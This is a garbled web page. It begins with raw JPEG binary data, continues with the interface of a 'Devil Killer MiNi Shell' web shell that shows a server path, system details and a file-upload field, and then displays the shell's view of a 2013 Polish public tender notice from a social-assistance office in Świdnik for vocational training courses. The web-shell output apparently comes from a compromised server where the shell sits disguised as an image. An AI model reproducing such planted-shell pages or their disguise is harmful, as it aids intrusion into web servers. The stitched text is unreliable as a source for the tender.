JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130606/217758-N-2013.html

<p class="kh_header"><b>Świdnik: Zorganizowanie i przeprowadzenie szkoleń oraz kursów 
w ramach systemowego projektu MOPS Świdnik _ CZAS NA ZMIANY _</b><br>
<b>Numer ogłoszenia: 217758 - 2013; data zamieszczenia: 06.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Wyszyńskiego 12, 21-040 Świdnik, woj. lubelskie, tel. 81 468 69 00, faks 81 468 69 00.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.swidnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń oraz kursów 
w ramach systemowego projektu MOPS Świdnik _ CZAS NA ZMIANY _.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń oraz kursów dla uczestników i uczestniczek  projektu _CZAS NA ZMIANY- systemowy projekt MOPS Świdnik_ współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII. Promocja integracji społecznej.Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej w zakresie 10  bloków tematycznych.

2.  Przedmiot zamówienia będzie realizowany z podziałem na następujące części - zadania:
1)	Zadanie Nr 1 
	szkolenie_Indywidualna terapia psychospołeczna z treningiem kompetencji 
i umiejętności społecznych - dla grupy 30 osób 
2)	Zadanie Nr 2   
	kurs_Kosmetyczka z umiejętnością stylizacji paznokci i wizażem - dla maksymalnie 5 osób
3)	Zadanie Nr 3    
	kurs_ Cukiernik z obsługą kasy fiskalnej - dla maksymalnie 4 osób
4)	Zadanie Nr 4   
	kurs_Kucharz małej gastronomii - dla maksymalnie 1 osoby
5)	Zadanie Nr 5  
	kurs_ Magazynier z obsługą wózka i kasy fiskalnej - dla maksymalnie 2 osób
6)	Zadanie Nr 6 
	kurs_ Kadry i płace - dla maksymalnie 2 osób
7)	Zadanie Nr 7  
	kurs_Florysta z obsługą kasy fiskalnej i komputera - dla maksymalnie 3 osób
8)	Zadanie Nr 8  
	kurs_ Sprzedawca z obsługą kasy fiskalnej i komputera - dla maksymalnie 7 osób
9)	Zadanie Nr 9  
	kurs_ Operator koparko-ładowarki typ kl. III - dla maksymalnie 4 osób
10)	Zadanie Nr 10  
	kurs_Ogrodnik - dla maksymalnie 1 osoby

3. Szczegółowy zakres przedmiotu zamówienia określony został w załączniku 
Nr 1 do SIWZ - Opis przedmiotu zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-4, 80.57.00.00-0, 55.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania uprawnień Wykonawca winien wykazać, że jest uprawniony do prowadzenia szkoleń/kursów na podstawie wpisu do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy zgodnie z art. 20 Ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz.U. z 2008 r. Nr 69, poz. 415 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie należycie wykonał lub wykonuje 
a)	dla ZADANIA nr 1 - co najmniej dwie usługi szkoleniowe obejmujące tematykę 
z zakresu umiejętności społecznych oraz trening kompetencji, w tym jedna z tych usług na kwotę co najmniej 10.000 PLN brutto 
b)	dla ZADANIA nr 2 - co najmniej dwie usługi szkoleniowe obejmujące tematykę z zakresu kosmetyki , na kwotę co najmniej 2.000 PLN brutto każda z usług 
c)	dla ZADANIA nr 3- co najmniej dwie usługi szkoleniowe obejmujące tematykę z zakresu  cukiernictwa, na kwotę co najmniej 2.000 PLN brutto każda z usług 
d)	dla ZADANIA nr 4 - co najmniej dwie usługi szkoleniowe obejmujące tematykę z zakresu gastronomi, na kwotę co najmniej 2.000 PLN brutto każda z usług 
e)	dla ZADANIA nr 5 - co najmniej dwie usługi szkoleniowe obejmujące tematykę z zakresu obsługi wózka i kasy fiskalnej, na kwotę co najmniej 2.500 PLN brutto każda z usług 
f)	dla ZADANIA nr 6 - co najmniej dwie usługi szkoleniowe obejmujące tematykę z zakresu kadry i płace, na kwotę co najmniej 2.000 PLN brutto każda z usług 
g)	dla ZADANIA nr 7 - co najmniej dwie usługi szkoleniowe obejmujące tematykę z zakresu florystyki, na kwotę co najmniej 1.500 PLN brutto każda z usług 
h)	dla ZADANIA nr 8 - co najmniej dwie usługi szkoleniowe obejmujące tematykę z zakresu obsługi kasy fiskalnej i komputera, na kwotę co najmniej 1.000 PLN brutto każda z usług 
i)	dla ZADANIA nr 9 - co najmniej dwie usługi szkoleniowe obejmujące tematykę z zakresu obsługi koparko-ładowarki, na kwotę co najmniej 2.000 PLN brutto każda z usług 
j)	dla ZADANIA nr 10 - co najmniej dwie usługi szkoleniowe obejmujące tematykę z zakresu ogrodnictwa, na kwotę co najmniej 1.000 PLN brutto każda z usług 

W przypadku kwot w walutach obcych Zamawiający dokona ich przeliczenia według średniego kursu NBP z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.
Ocena  spełniania  warunków  udziału  w  postępowaniu  o  zamówienie  publiczne przeprowadzona  będzie  w  oparciu  o  złożone  przez  wykonawców  oświadczenia i dokumenty zgodnie z formułą _spełnia - nie spełnia_</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku Wykonawca winien wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia (będą prowadzić zajęcia szkoleniowe oraz kursy), w tym:
a)	 dla ZADANIA nr 1 - co najmniej 2 różnymi osobami, posiadającymi wykształcenie wyższe magisterskie z zakresu psychologii lub pedagogiki oraz co najmniej 5-letnie doświadczenie w pracy terapeutycznej
b)	dla ZADAŃ od nr 2 do nr 10 - w zakresie każdego z zadań - co najmniej 1 osobą posiadającą wykształcenie co najmniej średnie i co najmniej 3 letnią praktykę zawodową w zakresie prowadzenia kursów o tematyce objętej przedmiotem zadania, w wykonaniu którego wykazana osoba będzie uczestniczyła. 
Ocena  spełniania  warunków  udziału  w  postępowaniu  o  zamówienie  publiczne przeprowadzona  będzie  w  oparciu  o  złożone  przez  wykonawców  oświadczenia i dokumenty zgodnie z formułą _spełnia - nie spełnia_</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykonawca zobowiązany jest sporządzić opis oferowanej usługi/usług wypełniając załącznik Nr 9 do SIWZ - SZCZEGÓŁOWY PROGRAM SZKOLENIA/KURSU dla każdej części - zadania oddzielnie.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Przez wskazane w pkt III.4.1) potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje należy rozumieć - Dokument potwierdzający posiadanie uprawnień do wykonywania określonej działalności - tj. potwierdzający wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy zgodnie z art. 20 Ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz.U. z 2008 r. Nr 69, poz. 415 z późn. zm.), (w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez wykonawcę)
2. Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków; zobowiązany jest w takiej sytuacji udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
3.Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt.III.4.3.1),  zastępuje  się  je  dokumentem  zawierającym  oświadczenie,  w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone  przed  właściwym  organem  sądowym, administracyjnym  albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem, wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w następujących przypadkach:
1)	gdy zaistnieje konieczność zmiany osoby/osób  w szczególności prowadzących  szkolenie/kurs wskazanych w wykazie osób w szczególności w przypadkach losowych, z zastrzeżeniem, że zmiennik musi posiadać nie mniejsze doświadczenie 
i kwalifikacje;
2)	gdy zaistnieje konieczność zmiany terminów i miejsca prowadzenia zajęć, 
w szczególności z przyczyn niezawinionych przez strony lub jeżeli ze względu na wypadek losowy nie będzie możliwe ich przeprowadzenie w ustalonym terminie lub miejscu. Zmiana terminu lub miejsca nie może spowodować zmiany standardu i ceny wynikającej z oferty Wykonawcy;
3)	w przypadku ustawowej zmiany stawki podatku Vat, wynagrodzenie należne Wykonawcy podlega zmianie odpowiednio o kwotę podatku VAT wynikającą ze zmienionej stawki VAT, obowiązującej w chwili powstania obowiązku podatkowego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.swidnik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Świdniku
21-040 Świdnik,  ulica Kard. Stefana Wyszyńskiego 12, w pokoju nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2013 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Świdniku
21-040 Świdnik,  ulica Kard. Stefana Wyszyńskiego 12, w pokoju nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane w 89,5% ze środków projektu _CZAS NA ZMIANY - systemowy projekt MOPS Świdnik_ - Zadanie Nr 1: Aktywna Integracja współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII. Promocja integracji społecznej. Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej (Umowa Ramowa zawarta pomiędzy Samorządem Województwa Lubelskiego a Gminą Miejską Świdnik z dnia 18 lipca 2008r. nr POKL.07.01.01-06-019/08 - Aneks do Umowy Ramowej z dnia 25.03.2013r. nr POKL.07.01.01-06-019/08-07..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 szkolenie_Indywidualna terapia psychospołeczna z treningiem kompetencji 
i umiejętności społecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poszczególne etapy realizacji zadania:

1. Indywidualna terapia psychospołeczna dla 30 uczestników projektu w wymiarze                  8 godzin dla każdego z nich. Indywidualne dostosowanie częstotliwości spotkań do potrzeb i możliwości uczestników projektu. Maksymalnie 2 spotkanie tygodniowo dla uczestnika projektu:
      Łącznie 240 godzin.
2. Trening kompetencji i umiejętności społecznych dla 30 uczestników projektu                       w łącznym wymiarze 15 godzin z podziałem na grupy:
I grupa - 15 osób - 7,5 godziny zajęć 
II grupa - 15 osób - 7,5 godziny zajęć 
Łącznie:  15 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-4, 80.57.00.00-0, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2   
	kurs_Kosmetyczka z umiejętnością stylizacji paznokci i wizażem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: zajęcia teoretyczne i praktyczne z zakresu materiałoznawstwa i technologii kosmetyki i pielęgnacji twarzy oraz ciała, manicure, pedicure, techniki zdobienia, przedłużania i modelowania paznokci z uwzględnieniem bezpieczeństwa i higieny pracy,  kreowanie wizerunku. Łączny wymiar 250 godzin kursu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-4, 80.57.00.00-0, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3    
	kurs_ Cukiernik z obsługą kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: zajęcia teoretyczne i praktyczne z zakresu technologia żywienia, obsługa maszyn, urządzeń i sprzętu, wytwarzanie ciast, sporządzanie mas, kremów, deserów i innych półproduktów, techniki, montaż i dekoracja wyrobów ciastkarskich z uwzględnieniem bezpieczeństwa i higieny pracy. Łączny wymiar 250 godzin kursu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-4, 80.57.00.00-0, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4   kurs_Kucharz małej gastronomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: zajęcia teoretyczne i praktyczne z zakresu gastronomii (w tym podstaw żywienia, technologii gastronomicznej, jakości i norm w zakresie obsługi gastronomicznej, minimum HACCAP), przyrządzania potraw, poznanie receptur, aranżacji. Łączny wymiar 250 godzin kursu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-4, 80.57.00.00-0, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5  
	kurs_ Magazynier z obsługą wózka i kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: zajęcia teoretyczna i praktyczne z zakresu: budowa wózków jezdniowych, typy stosowanych wózków jezdniowych, czynności operatora przed podjęciem pracy i w czasie pracy , wiadomości z zakresu ładunkoznawstwa , obsługa kasy fiskalnej, gospodarka magazynowa, wiadomości z zakresu BHP, praktyczna nauka jazdy wózkiem jezdniowym. Łączny wymiar 250 godzin kursu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-4, 80.57.00.00-0, 55.30.00.00-3.</p></li>
